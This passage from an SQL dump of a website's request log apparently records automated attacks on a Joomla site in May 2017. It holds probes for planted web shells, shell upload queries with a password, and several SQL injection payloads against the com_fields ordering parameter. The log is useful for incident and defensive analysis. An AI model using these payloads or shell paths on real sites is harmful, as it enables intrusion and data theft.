00:00:00'),(9356,'http://hallcrestheights.org/plugins/content/contact/backup.php',NULL,'http://hallcrestheights.org/plugins/content/contact/backup.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9357,'http://hallcrestheights.org/modules/mod_related_items/tmpl/update.php',NULL,'http://hallcrestheights.org/modules/mod_related_items/tmpl/update.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9358,'http://hallcrestheights.org/ojla.php',NULL,'http://hallcrestheights.org/ojla.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9359,'http://hallcrestheights.org/nwhtq.php',NULL,'http://hallcrestheights.org/nwhtq.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9360,'http://hallcrestheights.org/modules/mod_mijopolls/version.php',NULL,'http://hallcrestheights.org/modules/mod_mijopolls/version.php','',1,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9361,'http://hallcrestheights.org/modules/mod_ariimageslidersa/slide-menues.php',NULL,'http://hallcrestheights.org/modules/mod_ariimageslidersa/slide-menues.php','',1,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9362,'http://hallcrestheights.org/modules/mod_pwebcontact/setup.php',NULL,'http://hallcrestheights.org/modules/mod_pwebcontact/setup.php','',1,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9363,'http://hallcrestheights.org/modules/mod_roksprocket/lib/backup.php',NULL,'http://hallcrestheights.org/modules/mod_roksprocket/lib/backup.php','',1,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9364,'http://hallcrestheights.org/modules/mod_random_image/media-views-rtl.php',NULL,'http://hallcrestheights.org/modules/mod_random_image/media-views-rtl.php','',3,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9365,'http://hallcrestheights.org/modules/mod_articles_news/version.php',NULL,'http://hallcrestheights.org/modules/mod_articles_news/version.php','',1,0,'2017-05-14 14:24:43','0000-00-00 00:00:00'),(9366,'http://hallcrestheights.org/reyochc.php',NULL,'http://hallcrestheights.org/reyochc.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9367,'http://hallcrestheights.org/plugins/content/pagebreak/backup.php',NULL,'http://hallcrestheights.org/plugins/content/pagebreak/backup.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9368,'http://hallcrestheights.org/plugins/content/pagebreak/config.php',NULL,'http://hallcrestheights.org/plugins/content/pagebreak/config.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9369,'http://hallcrestheights.org/plugins/content/pagebreak/update.php',NULL,'http://hallcrestheights.org/plugins/content/pagebreak/update.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9370,'http://hallcrestheights.org/yvucr.php',NULL,'http://hallcrestheights.org/yvucr.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9371,'http://hallcrestheights.org/plugins/jsnimageshow/sourcepicasa/install/smile.php',NULL,'http://hallcrestheights.org/plugins/jsnimageshow/sourcepicasa/install/smile.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9372,'http://hallcrestheights.org/templates/beez3/html/com_content/backup.php',NULL,'http://hallcrestheights.org/templates/beez3/html/com_content/backup.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9373,'http://hallcrestheights.org/plugins/editors/version.php',NULL,'http://hallcrestheights.org/plugins/editors/version.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9374,'http://hallcrestheights.org/tmp/1s7bu.php',NULL,'http://hallcrestheights.org/tmp/1s7bu.php','',1,0,'2017-05-14 14:25:14','0000-00-00 00:00:00'),(9375,'http://hallcrestheights.org/plugins/system/jsntplframework/language/pl-pl/cmsbuild.php',NULL,'http://hallcrestheights.org/plugins/system/jsntplframework/language/pl-pl/cmsbuild.php','',1,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9376,'http://hallcrestheights.org/tmp/s.php',NULL,'http://hallcrestheights.org/tmp/s.php','',1,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9377,'http://hallcrestheights.org/plugins/search/rtl.php',NULL,'http://hallcrestheights.org/plugins/search/rtl.php','',1,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9378,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/session_commit.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/session_commit.php','',1,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9379,'http://hallcrestheights.org/tmp/kd.php',NULL,'http://hallcrestheights.org/tmp/kd.php','',2,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9380,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/chgrp.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/chgrp.php','',1,0,'2017-05-14 14:25:15','0000-00-00 00:00:00'),(9381,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos-k6745-fiety-i20162637-uaixnrb-dggs/',NULL,'','',1,0,'2017-05-14 20:28:29','0000-00-00 00:00:00'),(9382,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg-zagp-i20162629-k14949-eciyyuw-uvfztji-gjina/',NULL,'http://search.yahoo.co.jp/','',3,0,'2017-05-14 21:53:19','0000-00-00 00:00:00'),(9383,'http://www.hallcrestheights.org/xhajvq-i20162633-lwczbiqs-osqx-oqkgq-aqyd-k7789-cptznzv-tjqoevp/',NULL,'https://www.google.co.jp/','',13,0,'2017-05-15 06:28:57','0000-00-00 00:00:00'),(9384,'http://www.hallcrestheights.org/i20162636-k53324-ixnmu-eahw-hioz-hjxbnwpg.htm',NULL,'','',1,0,'2017-05-15 08:44:14','0000-00-00 00:00:00'),(9385,'http://www.hallcrestheights.org/soegs-k11677-zxyife-tvtnd-yuuh-vfcyzls-i20162637-xxqroxae-hkskxyxe/',NULL,'','',2,0,'2017-05-15 13:40:38','0000-00-00 00:00:00'),(9386,'http://www.hallcrestheights.org/k57400-gnfznxvj-xpalt-itjshkyj-i20162633-yldpija-amdu.htm',NULL,'','',2,0,'2017-05-16 12:42:07','0000-00-00 00:00:00'),(9387,'http://www.hallcrestheights.org/pcscq-rufu-npkw-i20162628-xpoideot-wtvsoarm-osmgep-k13684-lalhe.htm',NULL,'','',2,0,'2017-05-16 17:28:37','0000-00-00 00:00:00'),(9388,'http://www.hallcrestheights.org/k47600-lugdltrs-mxxhy-i20162634-pzqjllzo-hnjumnt.htm',NULL,'','',2,0,'2017-05-17 01:59:15','0000-00-00 00:00:00'),(9389,'http://www.hallcrestheights.org/qlbow-i20162635-ciggec-eayaf-xrgl-nikghhm-k4577-bbxpgesm/',NULL,'','',1,0,'2017-05-18 06:03:38','0000-00-00 00:00:00'),(9390,'http://hallcrestheights.org//images/1ndex.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:23:24','0000-00-00 00:00:00'),(9391,'http://hallcrestheights.org//tmp.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-05-18 10:25:34','0000-00-00 00:00:00'),(9392,'http://hallcrestheights.org//configbak.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:23:31','0000-00-00 00:00:00'),(9393,'http://hallcrestheights.org//wp-cache.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:27:53','0000-00-00 00:00:00'),(9394,'http://hallcrestheights.org//includes.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:27:54','0000-00-00 00:00:00'),(9395,'http://hallcrestheights.org//webconfig.txt.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:29:01','0000-00-00 00:00:00'),(9396,'http://hallcrestheights.org//sql_dump.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:34:40','0000-00-00 00:00:00'),(9397,'http://hallcrestheights.org//thumb.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:22','0000-00-00 00:00:00'),(9398,'http://hallcrestheights.org//al277.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:27','0000-00-00 00:00:00'),(9399,'http://hallcrestheights.org//images/al277.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:29','0000-00-00 00:00:00'),(9400,'http://hallcrestheights.org//wsdl.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:31','0000-00-00 00:00:00'),(9401,'http://hallcrestheights.org//wp-data.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:34','0000-00-00 00:00:00'),(9402,'http://hallcrestheights.org//media/1ndex.php?z3=Y2lMNmhGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:36:21','0000-00-00 00:00:00'),(9403,'http://hallcrestheights.org//media/tmp.php?z3=Y2lMNmhGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:03','0000-00-00 00:00:00'),(9404,'http://hallcrestheights.org//libraries/joomla/jmails.php?z3=Y2lMNmhGLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:36:25','0000-00-00 00:00:00'),(9405,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:36:27','0000-00-00 00:00:00'),(9406,'http://hallcrestheights.org//google-assist.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:35:08','0000-00-00 00:00:00'),(9407,'http://hallcrestheights.org//roubt.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:37:36','0000-00-00 00:00:00'),(9408,'http://hallcrestheights.org//bookmark.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:38:59','0000-00-00 00:00:00'),(9409,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:44:47','0000-00-00 00:00:00'),(9410,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:45:35','0000-00-00 00:00:00'),(9411,'http://hallcrestheights.org//wp-content/themes/twentyeleven-child/footer.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:46:46','0000-00-00 00:00:00'),(9412,'http://hallcrestheights.org//images/stories/0day.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:48:40','0000-00-00 00:00:00'),(9413,'http://hallcrestheights.org//install.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:48:44','0000-00-00 00:00:00'),(9414,'http://hallcrestheights.org//shootmei.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:53:19','0000-00-00 00:00:00'),(9415,'http://hallcrestheights.org//infos.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:56:00','0000-00-00 00:00:00'),(9416,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:57:13','0000-00-00 00:00:00'),(9417,'http://hallcrestheights.org//RoseLeif.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:56:51','0000-00-00 00:00:00'),(9418,'http://hallcrestheights.org//authenticating.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:59:22','0000-00-00 00:00:00'),(9419,'http://hallcrestheights.org//show.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:00:44','0000-00-00 00:00:00'),(9420,'http://hallcrestheights.org//cache/news.php?z3=Y2lMNmhGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:01:54','0000-00-00 00:00:00'),(9421,'http://hallcrestheights.org//images/head.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 10:59:27','0000-00-00 00:00:00'),(9422,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:00:50','0000-00-00 00:00:00'),(9423,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=Y2lMNmhGLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:02:00','0000-00-00 00:00:00'),(9424,'http://hallcrestheights.org//media/reads.php?z3=Y2lMNmhGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-05-18 10:59:33','0000-00-00 00:00:00'),(9425,'http://hallcrestheights.org//oss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',8,0,'2017-05-18 11:03:32','0000-00-00 00:00:00'),(9426,'http://hallcrestheights.org//images/stories/rekan.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',8,0,'2017-05-18 11:02:48','0000-00-00 00:00:00'),(9427,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/ciL6hF.php',NULL,'','',1,0,'2017-05-18 11:04:19','0000-00-00 00:00:00'),(9428,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/ciL6hF.php',NULL,'','',1,0,'2017-05-18 11:03:34','0000-00-00 00:00:00'),(9429,'http://hallcrestheights.org//wp-content/uploads/ciL6hF.php',NULL,'','',1,0,'2017-05-18 11:07:52','0000-00-00 00:00:00'),(9430,'http://hallcrestheights.org//ciL6hF.php',NULL,'','',1,0,'2017-05-18 11:08:41','0000-00-00 00:00:00'),(9431,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/ciL6hF.php',NULL,'','',1,0,'2017-05-18 11:06:36','0000-00-00 00:00:00'),(9432,'http://hallcrestheights.org//by.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',7,0,'2017-05-18 11:08:41','0000-00-00 00:00:00'),(9433,'http://hallcrestheights.org//images/laj.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-05-18 11:11:03','0000-00-00 00:00:00'),(9434,'http://hallcrestheights.org//r3x.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:12:12','0000-00-00 00:00:00'),(9435,'http://hallcrestheights.org//log.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:12:14','0000-00-00 00:00:00'),(9436,'http://hallcrestheights.org//includes/u2p.php?z3=Y2lMNmhGLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:11:30','0000-00-00 00:00:00'),(9437,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=Y2lMNmhGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:11:32','0000-00-00 00:00:00'),(9438,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=Y2lMNmhGLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:12:20','0000-00-00 00:00:00'),(9439,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=Y2lMNmhGLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:10:15','0000-00-00 00:00:00'),(9440,'http://hallcrestheights.org//update.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:11:37','0000-00-00 00:00:00'),(9441,'http://hallcrestheights.org//wp-main.php?z3=Y2lMNmhGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:11:40','0000-00-00 00:00:00'),(9442,'http://hallcrestheights.org//images/robots.txt.php?z3=Y2lMNmhGLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:10:22','0000-00-00 00:00:00'),(9443,'http://hallcrestheights.org//cli/40dd1d.php?z3=Y2lMNmhGLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-18 11:11:43','0000-00-00 00:00:00'),(9444,'http://hallcrestheights.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(2,concat(0x7e,(version())),0)',NULL,'','',1,0,'2017-05-18 13:32:16','0000-00-00 00:00:00'),(9445,'http://www.hallcrestheights.org/i20162635-k44980-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-05-18 16:55:41','0000-00-00 00:00:00'),(9446,'http://www.hallcrestheights.org/k61280-ixnmueah-whioz-i20162630-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-05-18 21:24:26','0000-00-00 00:00:00'),(9447,'http://www.hallcrestheights.org/jgletk-k33136-ymdrqz-i20162632-nrvmlk-swaz-vkecqq.htm',NULL,'','',1,0,'2017-05-19 01:34:28','0000-00-00 00:00:00'),(9448,'http://www.hallcrestheights.org/i20162635-cwhri-wgpekz-k24577-qdwkv-umzb-saiimjz/',NULL,'','',2,0,'2017-05-19 03:57:56','0000-00-00 00:00:00'),(9449,'http://www.hallcrestheights.org/k50820-ryvhrhmq-i20162631-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'https://www.google.co.jp/','',5,0,'2017-05-19 06:45:50','0000-00-00 00:00:00'),(9450,'http://hallcrestheights.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1,extractvalue(null,concat(0x3b,(select database())))--',NULL,'','',17,0,'2017-05-19 12:49:24','0000-00-00 00:00:00'),(9451,'http://hallcrestheights.org/th1s_1s_a_4o4.html',NULL,'http://www.google.com/url?url=hallcrestheights.org&yahoo.com','',2,0,'2017-05-19 19:15:13','0000-00-00 00:00:00'),(9452,'http://hallcrestheights.org/a',NULL,'','',1,0,'2017-05-19 19:16:12','0000-00-00 00:00:00'),(9453,'http://hallcrestheights.org/media/system/js/s?=1',NULL,'','',1,0,'2017-05-19 19:17:23','0000-00-00 00:00:00'),(9454,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-i20162635-wtvsoar-mosm-k23980-gepla-lheliy.htm',NULL,'','',2,0,'2017-05-19 22:40:13','0000-00-00 00:00:00'),(9455,'http://www.hallcrestheights.org/i20162628-gnfznxv-jxpaltit-k53708-jshkyjyl-dpijaam-durtae-npggw.htm',NULL,'','',1,0,'2017-05-20 10:18:58','0000-00-00 00:00:00'),(9456,'http://www.hallcrestheights.org/mrcq-gbeifuw-grabt-nwyrqs-emgwkow-hmemxgku-cybnpzk-icvejxku-i20162634-k21612-lzjc-jkntsxjl-nuuuvtff.htm',NULL,'','',3,0,'2017-05-20 15:13:09','0000-00-00 00:00:00'),(9457,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-k984-vqawuo-xzmnp-i20162633-zvsgcr-lycmc-zoqqelu-dpwcmeg.htm',NULL,'','',3,0,'2017-05-20 18:02:39','0000-00-00 00:00:00'),(9458,'http://hallcrestheights.org/components/com_contact/models/setup.php',NULL,'http://hallcrestheights.org/components/com_contact/models/setup.php','',1,0,'2017-05-21 14:01:16','0000-00-00 00:00:00'),(9459,'http://hallcrestheights.org/components/com_content/models/setup.php',NULL,'http://hallcrestheights.org/components/com_content/models/setup.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9460,'http://hallcrestheights.org/includes/main.inc.php',NULL,'http://hallcrestheights.org/includes/main.inc.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9461,'http://hallcrestheights.org/components/com_jce/media/wp-setup.php',NULL,'http://hallcrestheights.org/components/com_jce/media/wp-setup.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9462,'http://hallcrestheights.org/layouts/libraries/cms/html/bootstrap/setup.php',NULL,'http://hallcrestheights.org/layouts/libraries/cms/html/bootstrap/setup.php','',1,0,'2017-05-21 19:50:36','0000-00-00 00:00:00'),(9463,'http://hallcrestheights.org/components/com_content/views/category/dydjjix.php',NULL,'http://hallcrestheights.org/components/com_content/views/category/dydjjix.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9464,'http://hallcrestheights.org/components/com_media/h07ffi.php',NULL,'http://hallcrestheights.org/components/com_media/h07ffi.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9465,'http://hallcrestheights.org/components/com_content/models/sh1.php',NULL,'http://hallcrestheights.org/components/com_content/models/sh1.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9466,'http://hallcrestheights.org/libraries/gmdate.php',NULL,'http://hallcrestheights.org/libraries/gmdate.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9467,'http://hallcrestheights.org/images/green.php',NULL,'http://hallcrestheights.org/images/green.php','',1,0,'2017-05-21 19:51:56','0000-00-00 00:00:00'),(9468,'http://hallcrestheights.org/components/com_helloworld/hello.php',NULL,'http://hallcrestheights.org/components/com_helloworld/hello.php','',1,0,'2017-05-21 19:51:57','0000-00-00 00:00:00'),(9469,'http://hallcrestheights.org/libraries/cms/toolbar/button/media-views-rtl.php',NULL,'http://hallcrestheights.org/libraries/cms/toolbar/button/media-views-rtl.php','',1,0,'2017-05-21 19:51:57','0000-00-00 00:00:00'),(9470,'http://hallcrestheights.org/libraries/joomla/user/temp.php',NULL,'http://hallcrestheights.org/libraries/joomla/user/temp.php','',1,0,'2017-05-21 19:53:02','0000-00-00 00:00:00'),(9471,'http://hallcrestheights.org/media/editors/codemirror/mode/tiddlywiki/timezone_offset_get.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/tiddlywiki/timezone_offset_get.php','',1,0,'2017-05-21 19:53:02','0000-00-00 00:00:00'),(9472,'http://hallcrestheights.org/wp-inc.php',NULL,'http://hallcrestheights.org/wp-inc.php','',3,0,'2017-05-21 19:53:02','0000-00-00 00:00:00'),(9473,'http://hallcrestheights.org/plugins/mod.php',NULL,'http://hallcrestheights.org/plugins/mod.php','',1,0,'2017-05-21 19:51:42','0000-00-00 00:00:00'),(9474,'http://hallcrestheights.org/plugins/system/t3/base-bs3/html/com_contact/category/substr_replace.php',NULL,'http://hallcrestheights.org/plugins/system/t3/base-bs3/html/com_contact/category/substr_replace.php','',1,0,'2017-05-21 19:53:03','0000-00-00 00:00:00'),(9475,'http://hallcrestheights.org/templates/beez3/images/system/backup.php',NULL,'http://hallcrestheights.org/templates/beez3/images/system/backup.php','',1,0,'2017-05-21 19:51:42','0000-00-00 00:00:00'),(9476,'http://hallcrestheights.org/templates/system/jmp-contects.php',NULL,'http://hallcrestheights.org/templates/system/jmp-contects.php','',1,0,'2017-05-21 19:53:03','0000-00-00 00:00:00'),(9477,'http://hallcrestheights.org/templates/atomic/css/blueprint/print.php',NULL,'http://hallcrestheights.org/templates/atomic/css/blueprint/print.php','',1,0,'2017-05-21 19:53:03','0000-00-00 00:00:00'),(9478,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-i20162635-k46777-yuuh-vfcyzls-xxqroxae-hkskxyxe/',NULL,'','',1,0,'2017-05-21 22:53:07','0000-00-00 00:00:00'),(9479,'http://www.hallcrestheights.org/bsoapa-i20162633-zapstasg-mhcq-cmckf-rdtf-k7389-kgpvbch-siwhork-lvzrt/',NULL,'','',3,0,'2017-05-22 03:58:03','0000-00-00 00:00:00'),(9480,'http://hallcrestheights.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8109 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(8109=8109,1))),0x71786b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY ',NULL,'http://www.google.com/','',1,0,'2017-05-22 09:15:47','0000-00-00 00:00:00'),(9481,'http://hallcrestheights.org/components/com_content/views/category/config.php',NULL,'http://hallcrestheights.org/components/com_content/views/category/config.php','',1,0,'2017-05-22 14:19:41','0000-00-00 00:00:00'),(9482,'http://hallcrestheights.org/fwsljf.php',NULL,'http://hallcrestheights.org/fwsljf.php','',1,0,'2017-05-22 14:19:41','0000-00-00 00:00:00'),(9483,'http://hallcrestheights.org/logic.php',NULL,'http://hallcrestheights.org/logic.php','',1,0,'2017-05-22 14:19:42','0000-00-00 00:00:00'),(9484,'http://hallcrestheights.org/opcaches.php',NULL,'http://hallcrestheights.org/opcaches.php','',1,0,'2017-05-22 14:18:22','0000-00-00 00:00:00'),(9485,'http://hallcrestheights.org/dlwun.php',NULL,'http://hallcrestheights.org/dlwun.php','',1,0,'2017-05-22 14:18:22','0000-00-00 00:00:00'),(9486,'http://hallcrestheights.org/modx.php',NULL,'http://hallcrestheights.org/modx.php','',6,0,'2017-05-22 14:19:44','0000-00-00 00:00:00'),(9487,'http://hallcrestheights.org/pdo.inc.php',NULL,'http://hallcrestheights.org/pdo.inc.php','',2,0,'2017-05-22 14:19:44','0000-00-00 00:00:00'),(9488,'http://hallcrestheights.org/plugins/content/josdewplayer/language/en-gb/dir.php',NULL,'http://hallcrestheights.org/plugins/content/josdewplayer/language/en-gb/dir.php','',1,0,'2017-05-22 14:20:25','0000-00-00 00:00:00'),(9489,'http://hallcrestheights.org/plugins/content/apismtp/ini.php',NULL,'http://hallcrestheights.org/plugins/content/apismtp/ini.php','',4,0,'2017-05-22 14:20:25','0000-00-00 00:00:00'),(9490,'http://hallcrestheights.org/plugins/content/jw_sig/jw_sig/includes/js/jquery_fancybox/fancybox/.cache.php',NULL,'http://hallcrestheights.org/plugins/content/jw_sig/jw_sig/includes/js/jquery_fancybox/fancybox/.cache.php','',1,0,'2017-05-22 14:19:06','0000-00-00 00:00:00'),(9491,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_caldav/language/lt-lt/opts.php',NULL,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_caldav/language/lt-lt/opts.php','',1,0,'2017-05-22 14:20:26','0000-00-00 00:00:00'),(9492,'http://hallcrestheights.org/plugins/content/jw_ts/jw_ts/includes/stream_socket_enable_crypto.php',NULL,'http://hallcrestheights.org/plugins/content/jw_ts/jw_ts/includes/stream_socket_enable_crypto.php','',1,0,'2017-05-22 14:20:26','0000-00-00 00:00:00'),(9493,'http://hallcrestheights.org/php.php',NULL,'http://hallcrestheights.org/php.php','',1,0,'2017-05-22 14:20:26','0000-00-00 00:00:00'),(9494,'http://hallcrestheights.org/plugins/content/pagenavigation/tmpl/backup.php',NULL,'http://hallcrestheights.org/plugins/content/pagenavigation/tmpl/backup.php','',1,0,'2017-05-22 14:20:27','0000-00-00 00:00:00'),(9495,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_jevents/language/hr-hr/opts.php',NULL,'http://hallcrestheights.org/plugins/dpcalendar/dpcalendar_jevents/language/hr-hr/opts.php','',1,0,'2017-05-22 14:20:27','0000-00-00 00:00:00'),(9496,'http://hallcrestheights.org/plugins/editors/codemirror/layouts/editors/update.php',NULL,'http://hallcrestheights.org/plugins/editors/codemirror/layouts/editors/update.php','',1,0,'2017-05-22 14:20:27','0000-00-00 00:00:00'),(9497,'http://hallcrestheights.org/plugins/editors/acyeditor/acyeditor/images/setup.php',NULL,'http://hallcrestheights.org/plugins/editors/acyeditor/acyeditor/images/setup.php','',1,0,'2017-05-22 14:20:27','0000-00-00 